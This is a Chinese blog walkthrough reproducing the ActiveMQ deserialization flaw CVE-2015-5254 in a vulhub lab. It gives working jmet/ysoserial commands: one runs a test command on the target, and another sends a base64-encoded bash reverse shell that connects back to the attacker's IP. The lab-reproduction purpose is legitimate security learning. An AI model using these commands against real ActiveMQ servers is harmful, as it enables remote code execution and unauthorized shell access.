0
点赞
收藏
分享

微信扫一扫

ActiveMQ 反序列化漏洞(CVE-2015-5254)

_LEON_ 2022-03-10 阅读 67

ActiveMQ 反序列化漏洞(CVE-2015-5254)

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

影响范围

Apache ActiveMQ 5.13.0之前5.x版本

使用网站工具

反弹shell生成

base64加密

jemt

利用限制

  • ActiveMQ版本不高于5.13.0
  • 利用该漏洞上传payload需要人为触发才能执行,大概意思是如果需要执行该漏洞上传的payload
    • 一种选择是该组件存在弱口令密码,可以使攻击者直接进入管理后台执行,执行payload的时间由攻击者掌握;
    • 第二种选择就是该组件的管理员在进行后台管理时触发了payload,但这样执行payload的时间由管理员掌握

漏洞环境

vulhub靶场

运行漏洞环境:

docker-compose up -d

环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://your-ip:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。

复现过程

漏洞利用过程如下:

  1. 构造(可以使用ysoserial)可执行命令的序列化对象
  2. 作为一个消息,发送给目标61616端口
  3. 访问web管理页面,读取消息,触发漏洞

使用jmet进行漏洞利用。首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。

jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

环境配置

靶机IP:192.168.10.112

执行:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.10.112 61616

执行此处命令后会给目标ActiveMQ加一个名为event的队列,可通过点击事件,触发远程命令

image-20220228195851224

使用以下命令进入docker查看

docker exec -it c9 /bin/sh

进入容器后查看tmp下的文件
ls /tmp

image-20220228201203889

反弹shell

与在线生成反弹shell网站上生成shell代码

image-20220228200706716

在进行base64加密

image-20220228200809768

加入命令中执行

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMC4xMTQvOTAwMSAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.10.112 61616

image-20220228200756326

点击事件触发代码执行后可以看到反弹shell

image-20220228200953372

举报

相关推荐

0 条评论